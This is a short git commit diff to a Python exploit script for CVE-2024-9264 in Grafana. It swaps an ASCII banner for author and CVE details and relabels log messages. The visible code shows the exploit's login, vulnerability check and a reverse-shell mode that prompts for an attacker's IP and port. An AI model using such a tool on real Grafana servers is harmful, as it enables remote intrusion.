File Renamed

This commit is contained in:
Ubuntu
2025-11-05 13:58:08 +00:00
parent 10c5bf252c
commit 7028e15759
2 changed files with 26 additions and 33 deletions

View File

@@ -12,16 +12,19 @@ init(autoreset=True)
# -------------------------
# 프롤로그
# -------------------------
print(r"""
_ __ _____ _____ _____ ___
| | / /|_ _|/ ___||_ _| / _ \
| |/ / | | \ `--. | | / /_\ \
| \ | | `--. \ | | | _ |
| |\ \ _| |_ /\__/ / _| |_ | | | |
\_| \_/ \___/ \____/ \___/ \_| |_/
print(r"""
Edited by : secKrity - 이민준
CVE ID : CVE-2024-9264
Base Score : 9.4 / CRITICAL
Affected product : Grafana
Vulnerable version : v < 11.0.5+security-01
v < 11.0.6+security-01
@@ -223,7 +226,7 @@ if __name__ == "__main__":
log_event("Exploit Started")
info("Trying to Login...")
if exploit.login():
success("Login Success")
info("Login Success")
info("Exploit...")
output = exploit.check_vuln()
if output:
@@ -238,7 +241,7 @@ if __name__ == "__main__":
log_event("Exploit with Reverse Shell Started")
info("Trying to Get Reverse Shell...")
if exploit.login():
success("Login Success")
info("Login Success")
lhost = input("Attacker IP (LHOST): ")
lport = input("Attacker PORT (LPORT): ")
try: